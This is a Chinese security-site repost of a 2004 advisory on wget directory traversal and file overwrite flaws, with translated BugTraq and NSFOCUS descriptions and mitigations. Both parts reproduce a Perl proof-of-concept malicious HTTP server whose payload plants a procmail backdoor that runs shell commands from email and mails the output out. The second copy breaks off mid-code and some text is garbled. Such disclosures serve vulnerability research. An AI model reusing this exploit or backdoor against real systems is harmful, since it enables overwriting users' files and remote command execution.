 |
  |
|
| 首页 | 技术文章 | 软件下载 | 博客 | 论坛 | 精品教程 | 黑客动画 | 视频资源 | 在线服务 | 黑客游戏 | | ||||
 |
|
|||||||
|
||||||||
|
|||||
| wget程序 任意文件覆盖/添加/创建和其他一些漏洞 | |||||
作者:小花翻译 文章来源:CnXHacker.Net 点击数: 更新时间:2004-12-15  |
|||||
|
翻译水平简陋,错误之处请指出 译自 BugTraq 列表 日期 2004-12-09 概要: 程序: wget 版本: 1.8.x或更低 运行平台:Linux,部分POSIX,其他未知 测试:1.8.1(测试系统Debian Woody) 漏洞简述:任意文件覆盖/添加/创建 利用:远程或者本地 作者: Jan Minar 关于wget GNU wget 是一款免费软件包,用HTTP,HTTPS,FTP等协议来下载文件,这些都是应用非常广泛的协议。 他是LINUX系统集成的一款标准HTTP下载软件,是一款非交互的命令行工具。 漏洞: (0) 程序的简陋 用目前维护人员的话讲:"它的代码BUG很多,注释又少,很难理解,结构非常模糊。" 它迫切需要重新设计并改写。 wget有很多命令行参数是有问题的。 (1) wget程序不知道那个文件它有权限写 wget简单的认为当前目录都是它的猎物,它将高兴的向任意文件写入内容。恶意的HTML文件将引导它覆盖系统重要文件。比如: $ cd /home/user $ wget http://localhost/wgettrap.bashrc -> .bashrc (3)wget打印控制字符到终端设备 恶意HTTP响应能够覆盖部分终端,导致用户无法得到任何提示或者错误,以至用户认为错误根本不重要。 补丁: 目前还没有补丁 解决方案: 1.不要用 和wget 有关的程序/脚本 2.用类似pavuk, axel, or ncftpget这些程序替代wget 3.用-o和-O选项 漏洞发现过程: 这个问题我们几个月前已经发现。我们和Debian安全小组在2004-10-03联系,没有回应,以后我们没再联系他。 几天前,有人发现漏洞并公布。 测试程序: ["wgettrap.poc" (text/plain)] #!/usr/bin/perl -W # wgettrap.poc -- A POC for the wget(1) directory traversal vulnerability # # Copyright 2004 Jan Min谩艡 (jjminar fastmail fm) # License: Public Domain # # When wget connects to us, we send it a HTTP redirect constructed so that wget # wget will connect the second time, it will be attempting to override # ~/.procm4ilrc (well, provided that the user running wget has username 'jan' # 8-)). use POSIX qw(strftime); # This is our scheme/host/port $server = "http://localhost:31340"; # Use this + DNS poisoning with wget 1.9 & CVS #$server = "http://.."; # Wanna know who got infected? #$log = "/dev/pts/1"; # The filename we will try to overwrite on the target system $filename = "/home/jan/.procm4ilrc%00This%20part%20will%20be%20ignored."; ############### Payload ######################################### $email = 'your@mailbox'; $password = 'Pmrpuf ner cevzvgvirf'; $payload = <:0c | mail -s 'Wgettrap mail copy' $email :0 * ^X-Wgettrap-Command: shell * ^X-Wgettrap-Password: $password | /bin/sh -c '/bin/sh | mail -s "Wgettrap shell output" $email' EOP chomp $payload; ############### Payload ######################################### # A simple directory traversal, for greater effect $trick = "/.." . "%2f.." x 40; open LOG, ">$log" if $log; while(){ print LOG $_ if $log; if (/\Q$trick$filename\E/) { #if (/%2f/) { # We see the filename, so this is the second time # they're here. Time to feed the sploit. $second++; } elsif (/^Range: bytes=\(33\)-/) { # Appending goes like this: # (1) Tell'em what you're gonna tell'em # (2) Then tell'em just a half # (3) Close it # (4) Wait # (5) They're comin' back, with wget -c # (6) Tell'em the sploit # (7) Close again # (8) Wtf? They're comin' back with wget -c again # (9) Tell'em the rest... # (10) ... enjoying the backdoor at the same time print LOG "File if $1 bytes long\n" if $log; } elsif (/^\r?$/) { # The HTTP headers are over. Let's do it! $date = strftime ("%a, %e %b %Y %H:%M:%S %z", localtime); if (!$second) { # Print the payload print Date: $date\r Server: wgettrap 1.1\r Accept-Ranges: bytes\r Location: $server$trick$filename\r Content-Length: 43\r Connection: close\r Content-Type: text/html\r \r \r EOT } else { # Print the redirection print Date: $date\r Server: wgettrap 1.1\r Accept-Ranges: bytes\r Content-Length: 25\r Connection: close\r Content-Type: text/plain\r \r $payload EOT } exit 0; } 数字签名: -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQFBuBd++uczK20Fa5cRAkPDAJ9Pei45ZikiXw9uV+gZgNbR8H20+ACfWnB2 +mhl+IoTT0DnZ5lHSd3EiLE= =b7KN -----END PGP SIGNATURE----- --BwCQnh7xodEAoBMC-- 下面是绿盟的公告: 受影响系统: GNU wget 1.9.1 GNU wget 1.9 GNU wget 1.8.2 GNU wget 1.8.1 GNU wget 1.8 描述: -------------------------------------------------------------------------------- wget是一款多系统平台下的文件下载工具。 wget存在多个安全侍猓冻坦セ髡呖梢岳谜飧雎┒锤哺?建立等系统文件。 问题一是没有判断文件是否可写,在当前目录中不判断文件是否可写。恶意HTTP响应或恶意HTML文件可重定向wget覆盖系统文件: $ cd /home/user $ wget _blank>http://localhost/wgettrap.bashrc -> .bashrc 问题二是不正确过滤重定向数据,wget的对HTTP流数据缺少充分过滤,可能导致覆盖系统文件: # cd /root [1] # wget -x _blank>http://localhost/wgettrap.redirect-1.9 -> ../lib/libc-2.2.5.so [2] $ cd /foo/bar $ wget -r _blank>http://localhost/wgettrap.redirect-1.8 $Content$nbsp; -> ../../../../../../../../../home/jan/.bashrc [1] -> ../../../../../../../../../var/www/jan/.htaccess 问题三是wget可打印控制字符到终端,恶意HTTP应答可以覆盖终端部分字符而使用户不注意到错误信息。 问题四是wget在处理%00和%-转义控制字符时存在问题,可导致覆盖部分文件: $ cd /tmp $ ln -s index.html /path/to/foo $ wget -x _blank>http://localhost/ -> /path/to/foo <*来源:Jan Minar (_blank>jjminar@foo.fastmail.bar.fm) 链接:_blank>http://marc.theaimsgroup.com/?l=bugtraq&m=110269474112384&w=2 *> 测试方法: -------------------------------------------------------------------------------- 警 告 以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负! Jan Minar (_blank>jjminar@foo.fastmail.bar.fm)提供了如下测试方法: #!/usr/bin/perl -W # wgettrap.poc -- A POC for the wget(1) directory traversal vulnerability # # Copyright 2004 Jan Min谩艡 (jjminar fastmail fm) # License: Public Domain # # When wget connects to us, we send it a HTTP redirect constructed so that wget # wget will connect the second time, it will be attempting to override # ~/.procm4ilrc (well, provided that the user running wget has username 'jan' # 8-)). use POSIX qw(strftime); # This is our scheme/host/port $server = "_blank ; ?>http://localhost:31340"; # Use this + DNS poisoning with wget 1.9 & CVS #$server = "http://.."; # Wanna know who got infected? #$log = "/dev/pts/1"; # The filename we will try to overwrite on the target system $filename = "/home/jan/.procm4ilrc%00This%20part%20will%20be%20ignored."; ############### Payload ######################################### $email = 'your@mailbox'; $password = 'Pmrpuf ner cevzvgvirf'; $payload = <<EOP; :0c | mail -s 'Wgettrap mail copy' $email :0 * ^X-Wgettrap-Command: shell * ^X-Wgettrap-Password: $password | /bin/sh -c '/bin/sh | mail -s "Wgettrap shell output" $email' EOP chomp $payload; ############### Payload ######################################### # A simple directory traversal, for greater effect $trick = "/.." . "%2f.." x 40; open LOG, ">$log" if $log; while(<STDIN>){ print LOG $_ if $log; if (/\Q$trick$filename\E/) { #if (/%2f/) { # We see the filename, so this is the second time # they're here. Time to feed the sploit. $second++; } elsif (/^Range: bytes=\(33\)-/) { # Appending goes like this: # (1) Tell'em what you're gonna tell'em # (2) Then tell'em just a half # (3) Close it # (4) Wait # (5) They're comin' back, with wget -c # (6) Tell'em the sploit # (7) Close again # (8) Wtf? They're comin' back with wget -c again # (9) Tell'em the rest... # (10) ... enjoying the backdoor at the same time print LOG "File if $1 bytes long\n" if $log; } elsif (/^\r?$/) { # The HTTP headers are over. Let's do it! $date = strftime ("%a, %e %b %Y |
|||||
| 文章录入:IceRiver 责任编辑:IceRiver | |||||
| 【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】 | |||||
 网友评论:(只显示最新5条。评论内容只代表网友观点,与本站立场无关!) |
 |
|
| 关于我们 - 版权声明 - 帮助(?) - 广告服务 - 联系我们 - 友情链接 - 用户注册 - | Powered by ICE RIVER - STUDIO |
|
|
| » CnXHacker.CoM |  |
© CopyRight 2002-2006, CnXHacker.CoM™, Inc. All Rights Reserved. |
